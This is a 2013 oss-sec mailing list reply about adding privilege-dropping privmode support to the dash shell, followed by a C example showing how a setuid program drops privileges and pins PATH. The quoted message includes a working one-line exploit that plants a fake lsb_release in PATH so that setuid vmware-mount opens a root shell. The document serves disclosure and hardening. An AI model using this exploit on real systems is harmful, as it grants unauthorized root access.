oss-sec mailing list archives

Re: [PATCH] implement privmode support in dash


From: Tavis Ormandy <taviso () cmpxchg8b com>
Date: Thu, 22 Aug 2013 17:24:54 -0700

Simon McVittie <smcv () debian org> wrote:

On 22/08/13 18:59, Tavis Ormandy wrote:
For example, here is one I just found in vmware-tools that manages to
call popen("lsb_release") with effective uid zero:

$ cc -xc - -olsb_release<<<'main(){system("sh>`tty`
2>&1");}';PATH=.:$PATH vmware-mount # whoami root

Having (da)sh drop privileges is a useful bit of hardening, but it doesn't
help you if the vulnerable executable does a fork-and-exec without using
the shell (at least with one of the exec variants that respects $PATH,
like execvp), or some more friendly wrapper around fork-and-exec like
posix_spawnp() or GLib's g_spawn family of functions.


Sure, but we shouldn't let the perfect be the enemy of the good.
-fstack-protector doesn't magically make anything safe, but it's still a
useful mitigation tool that we would be worse off without.

We can't produce a patch that makes every crazy thing someone might want to
do while setuid safe, but this is a common pattern that Debian-derived
distributions lag behind on. I guarantee it will save you a few CVE's over
the next few years :)

Tavis.


-- 
-------------------------------------
taviso () cmpxchg8b com | pgp encrypted mail preferred
-------------------------------------------------------
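The hardening this thread discusses is the check dash's privmode performs (is the effective id different from the real id?) followed by dropping back to the real ids. The following is an added example, not code from the thread or from dash: a setuid program that applies the same drop explicitly in C before spawning a helper, and that also pins $PATH, which covers the fork-and-exec-with-execvp/posix_spawnp case Simon points out that a shell-level change cannot reach. It assumes a Linux/glibc environment (setresuid/setresgid and posix_spawnp); the helper name `true` and the fixed search path are illustrative choices.

```c
/* Added example (not from the oss-sec thread or from dash): do in the
   program what dash's privmode does in the shell, then spawn a helper
   with a pinned PATH. Assumes Linux/glibc. */
#define _GNU_SOURCE
#include <spawn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed search path, never taken from the caller's environment.
   Illustrative value; pick what your distribution actually guarantees. */
static const char SAFE_PATH[] = "/usr/sbin:/usr/bin:/sbin:/bin";

/* Same condition privmode checks: are we running with elevated ids? */
int running_setid(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Permanently drop to the real uid/gid. Group first: once the uid is
   dropped, changing the gid is no longer permitted. Returns 0 on success. */
int drop_privileges(void)
{
    gid_t rgid = getgid();
    uid_t ruid = getuid();

    if (setresgid(rgid, rgid, rgid) != 0)
        return -1;
    if (setresuid(ruid, ruid, ruid) != 0)
        return -1;

    /* Verify the drop took effect and cannot be undone. */
    if (geteuid() != ruid || getegid() != rgid)
        return -1;
    if (ruid != 0 && setuid(0) == 0)   /* must fail once dropped */
        return -1;
    return 0;
}

/* Spawn `helper` with privileges dropped and PATH pinned. posix_spawnp()
   searches the *parent's* PATH, so it is set in the parent before the
   spawn and also passed in the child's environment. Returns the child's
   exit status, or -1 on any failure. */
int run_helper_unprivileged(const char *helper)
{
    if (drop_privileges() != 0)
        return -1;
    if (setenv("PATH", SAFE_PATH, 1) != 0)
        return -1;

    char path_var[sizeof("PATH=") + sizeof(SAFE_PATH)];
    snprintf(path_var, sizeof path_var, "PATH=%s", SAFE_PATH);
    char *envp[] = { path_var, NULL };          /* no inherited environment */
    char *argv[] = { (char *)helper, NULL };

    pid_t pid;
    if (posix_spawnp(&pid, helper, NULL, NULL, argv, envp) != 0)
        return -1;

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    printf("running set-id: %s\n", running_setid() ? "yes" : "no");
    /* `true` stands in for a helper such as lsb_release. */
    int rc = run_helper_unprivileged("true");
    printf("helper exit status: %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

Note that the drop happens in the parent before the spawn, so it also protects a later `system()` or `popen()` call in the same process; pinning PATH covers the exec variants that search it, and passing an explicit environment keeps the helper from inheriting anything else the caller controls.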
